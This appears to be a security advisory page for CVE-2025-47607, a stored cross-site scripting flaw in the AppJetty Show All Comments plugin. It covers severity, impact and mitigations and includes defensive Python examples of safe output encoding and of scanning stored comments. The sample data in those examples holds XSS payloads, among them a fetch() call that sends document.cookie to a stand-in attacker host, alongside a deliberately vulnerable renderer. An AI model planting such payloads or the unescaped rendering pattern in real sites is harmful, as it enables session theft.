
CVE-2025-47607: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in AppJetty Show All Comments

Medium
Tags: Vulnerability, CVE-2025-47607, cve, cve-2025-47607, cwe-79
Published: Wed May 07 2025 (05/07/2025, 14:20:29 UTC)
Source: CVE
Vendor/Project: AppJetty
Product: Show All Comments

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AppJetty Show All Comments allows Stored XSS. This issue affects Show All Comments: from n/a through 7.0.1.

AI-Powered Analysis

Last updated: 07/05/2025, 05:54:44 UTC

Technical Analysis

CVE-2025-47607 is a medium-severity Stored Cross-Site Scripting (XSS) vulnerability in the AppJetty Show All Comments plugin, affecting all versions up to and including 7.0.1. It is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation): the plugin does not adequately encode user-supplied data before placing it in the pages it generates, so a value containing HTML or JavaScript is stored and later rendered as live markup. Whenever another user loads a page that includes the stored value, the script executes in that user's browser under the site's origin.

The CVSS 3.1 base score is 5.9 (AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L). The attack is launched over the network with low complexity, but the attacker needs a high-privilege account to store the payload (PR:H), and a victim must visit the page that renders it (UI:R). Scope is Changed because the vulnerable component is server-side plugin code while the payload executes in the victim's browser, a separate security authority. Confidentiality, integrity and availability are each rated Low: the script can issue requests with the victim's authenticated session, read and rewrite page content, and read session cookies where they are not marked HttpOnly.

No exploitation in the wild has been reported and no patch was linked at the time of this analysis. The CVE was published on May 7, 2025 with Patchstack as the assigning CNA; CISA has since added enrichment data (the "Cisa Enriched" flag below), which is routine for published CVEs and is not an indication of known exploitation or of a KEV listing.

Stored XSS is more dangerous than its reflected counterpart because the payload persists on the server and fires for every user who views the affected content, including administrators, rather than only for a user who follows a crafted link. Show All Comments is a comment-display plugin; Patchstack primarily covers WordPress plugins and themes, and the "n/a through 7.0.1" range is its convention for every release up to 7.0.1. Any page on which the plugin renders stored comment data is the injection sink, and from there an attacker can target logged-in sessions or serve phishing content.
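To make the CWE-79 pattern concrete, the following is an added illustration for this page, not code from the Show All Comments plugin (whose source is not reproduced here): a comment renderer that interpolates stored fields straight into markup, beside one that encodes each field for the context it lands in. The field names, the markup layout and the sample records are assumed for the example, and the `attacker.invalid` host is a reserved placeholder. It goes slightly beyond the advisory by also covering the JavaScript context, where HTML encoding is the wrong tool.

```python
"""Why stored comment fields turn into Stored XSS, and the encoding that
stops it.

Added example for this advisory, not code from the Show All Comments plugin:
the field names and the markup layout are assumed.
"""
import html
import json

# Constructed sample records: one benign, one stored by a privileged account
# (PR:H) with payloads in the author name, the author URL and the body.
STORED_COMMENTS = [
    {"author": "alice", "url": "https://example.com/", "body": "Looks good to me."},
    {"author": 'mallory" onmouseover="alert(1)',
     "url": "javascript:alert(document.cookie)",
     "body": "<img src=x onerror=\"fetch('//attacker.invalid/?c='+document.cookie)\">"},
]


def render_vulnerable(comment):
    """CWE-79 pattern: stored values are interpolated into markup as-is."""
    return (
        f'<li class="comment" data-author="{comment["author"]}">'
        f'<a href="{comment["url"]}">{comment["author"]}</a>: {comment["body"]}</li>'
    )


def safe_url(url):
    """Allow only http(s) links; javascript:, data: and the like become '#'."""
    return url if url.lower().startswith(("http://", "https://")) else "#"


def render_fixed(comment):
    """Encode each value for the context it lands in: attribute value,
    URL attribute, element text. html.escape(quote=True) also turns the
    quote characters into entities, so an attribute cannot be broken out of."""
    author = html.escape(comment["author"], quote=True)
    url = html.escape(safe_url(comment["url"]), quote=True)
    body = html.escape(comment["body"], quote=True)
    return (
        f'<li class="comment" data-author="{author}">'
        f'<a href="{url}">{author}</a>: {body}</li>'
    )


def render_script_fixed(comment):
    """HTML encoding is the wrong tool inside a <script> block: there the
    value must be serialised as JSON with '<' escaped, so that a stored
    '</script>' cannot close the block early."""
    payload = json.dumps(comment["body"]).replace("<", "\\u003c")
    return f"<script>var comment = {payload};</script>"


def breaks_out(rendered):
    """True when a stored value still appears as live markup in the output:
    an unescaped <img>, an event-handler attribute, a script-scheme link, or
    a second </script> that would terminate an inline script block."""
    return (
        "<img" in rendered
        or ' onmouseover="' in rendered
        or 'href="javascript:' in rendered
        or rendered.count("</script>") > 1
    )


if __name__ == "__main__":
    for comment in STORED_COMMENTS:
        print("vulnerable:", render_vulnerable(comment))
        print("fixed:     ", render_fixed(comment))
        print("script:    ", render_script_fixed(comment))
```

In WordPress the output-side equivalents are esc_html() for text, esc_attr() for attribute values, esc_url() for links and wp_json_encode() for values handed to script. A plugin that stores raw input but applies these on every output path does not have this class of bug, and that is what a reviewer should look for when a fixed release of the plugin appears.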

Potential Impact

For European organizations, the exposure is any website or web application running the Show All Comments plugin, especially sites that display user-generated content such as blog comments, forum posts or product reviews. Successful exploitation lets an attacker run script in visitors' browsers under the site's origin: hijacking authenticated sessions (including administrative ones) by issuing requests on the victim's behalf, reading session cookies where they are not HttpOnly, defacing pages, or redirecting users to phishing pages or malware. Beyond reputational damage, a breach of personal data that follows from such session abuse is reportable under GDPR and can bring regulatory and financial consequences.

Two CVSS factors shape the realistic threat. Because high privileges are required (PR:H), the initial injection comes from an insider with an elevated role or from a compromised privileged account, which narrows the attacker set but also means the payload is placed by an account the site trusts. Because scope is Changed (S:C), the effect is not confined to the plugin: the stored script runs in the browser of every user who views the page, so a single injection can compromise many sessions across the site. Given how interconnected European digital services are and the weight placed on data protection, a medium-severity issue of this kind can have outsized consequences if it is not addressed promptly.

Mitigation Recommendations

1. For the plugin maintainer, the root fix is output encoding: every stored value must be escaped for the context in which it is rendered (HTML text, attribute value, URL or JavaScript) before it reaches the page, and any HTML that must be preserved should pass through an allowlist sanitizer. Site operators cannot apply this themselves; they should update to a fixed release as soon as the vendor publishes one and, where that is not yet possible, consider disabling the plugin on pages that render comment data.
2. Deploy a Content Security Policy that disallows inline script (no 'unsafe-inline' in script-src, with nonces or hashes for legitimate inline code), so that an injected <script> element or event-handler attribute is blocked even while the encoding bug is present. This limits impact; it does not remove the vulnerability.
3. Enforce strict access controls and monitor privileged accounts for unusual activity, since exploitation requires a high-privilege account: alert on content or settings changes by those accounts that contain markup.
4. Conduct regular security audits and penetration tests focused on user input handling in the comment display and in any other field the plugin renders.
5. Apply the principle of least privilege so that as few accounts as possible hold roles able to store content that the plugin renders.
6. Monitor vendor communications for an official patch or update and apply it promptly once available.
7. Educate users and administrators about the risks of stored XSS and encourage reporting of suspicious page behaviour, such as unexpected redirects or prompts.
8. Use a web application firewall (WAF) with rules for common XSS patterns as a supplementary control; it can miss encoded or novel payloads and does not replace the plugin fix.
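An operator who suspects the bug has already been used wants to know whether a payload is sitting in stored data before any page renders it. The following is an added example for this page, not a tool from AppJetty or Patchstack: it parses each stored string with Python's html.parser and flags elements that can execute script, event-handler attributes, and URL fields or URL attributes that use a javascript:, vbscript: or data: scheme, normalising the scheme the way browsers do so that whitespace-padded and entity-encoded variants are still caught. The record layout (id, author_url, content) and the sample export are constructed; point it at an export of your own comment table instead.

```python
"""Scan stored comment records for markup that would execute if a plugin
rendered them without encoding (the Stored XSS pattern of CWE-79).

Added example for this advisory, not code from AppJetty or Patchstack. The
record layout (id, author_url, content) is a constructed stand-in for an
export of a site's comment table.
"""
import html
import re
from html.parser import HTMLParser

# Elements that can execute script or load active content on their own.
DANGEROUS_TAGS = {"script", "iframe", "object", "embed", "svg", "math",
                  "base", "meta", "link", "form", "style"}
# Attributes whose value is a URL and may therefore carry a script scheme.
URL_ATTRS = {"href", "src", "xlink:href", "action", "formaction", "data",
             "srcdoc"}
SCRIPT_SCHEMES = {"javascript", "vbscript", "data"}


def url_scheme(value):
    """Normalise the way browsers do before matching the scheme: strip
    ASCII control characters and whitespace, so 'java\\tscript:' is still
    recognised. Returns '' for relative URLs."""
    cleaned = re.sub(r"[\x00-\x20]", "", value).lower()
    return cleaned.split(":", 1)[0] if ":" in cleaned else ""


class PayloadFinder(HTMLParser):
    """Collects reasons why a fragment is dangerous. The parser decodes
    entity references inside attribute values, so an href of
    '&#106;avascript:...' is seen here as 'javascript:...'."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Self-closing tags (<img ... />) are routed here by the base class too.
        if tag in DANGEROUS_TAGS:
            self.findings.append(f"active element <{tag}>")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRS and value is not None:
                if url_scheme(value) in SCRIPT_SCHEMES:
                    self.findings.append(f"{name} on <{tag}> uses a script scheme")


def scan_fragment(text):
    """Return the list of findings for one stored HTML fragment."""
    finder = PayloadFinder()
    finder.feed(text)
    finder.close()
    return finder.findings


def audit_comments(records):
    """Walk every string field of every record and return (id, field, finding)
    tuples. Fields named *_url are checked as a bare URL, everything else as
    an HTML fragment."""
    hits = []
    for rec in records:
        for field, value in rec.items():
            if field == "id" or not isinstance(value, str):
                continue
            if field.endswith("_url"):
                if url_scheme(html.unescape(value)) in SCRIPT_SCHEMES:
                    hits.append((rec["id"], field, "URL uses a script scheme"))
            else:
                for finding in scan_fragment(value):
                    hits.append((rec["id"], field, finding))
    return hits


# Constructed sample export: three ordinary comments and three carrying payloads.
SAMPLE_EXPORT = [
    {"id": 1, "author_url": "https://example.com/", "content": "Great post, thanks."},
    {"id": 2, "author_url": "", "content": "Is 2 < 3 here? Yes & it renders fine."},
    {"id": 3, "author_url": "https://example.org/", "content": "<b>bold</b> is harmless"},
    {"id": 4, "author_url": "", "content": "<IMG SRC=x onerror=\"alert(document.domain)\">"},
    {"id": 5, "author_url": "&#106;avascript:alert(1)", "content": "check my site"},
    {"id": 6, "author_url": "",
     "content": "<svg><script>fetch('//attacker.invalid/'+document.cookie)</script></svg>"},
]

if __name__ == "__main__":
    for rec_id, field, finding in audit_comments(SAMPLE_EXPORT):
        print(f"comment {rec_id}: {field}: {finding}")
```

A hit is a lead, not proof: the plugin may already escape that field on output, and harmless formatting such as `<b>` is deliberately not flagged. Treat hits from accounts with elevated roles as the priority, since that is the privilege level the CVSS vector requires for injection.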


Technical Details

Data Version
5.1
Assigner Short Name
Patchstack
Date Reserved
2025-05-07T10:44:34.646Z
Cisa Enriched
true
Cvss Version
3.1
State
PUBLISHED

Threat ID: 682d9818c4522896dcbd83ab

Added to database: 5/21/2025, 9:08:40 AM

Last enriched: 7/5/2025, 5:54:44 AM

Last updated: 7/30/2025, 9:49:49 AM
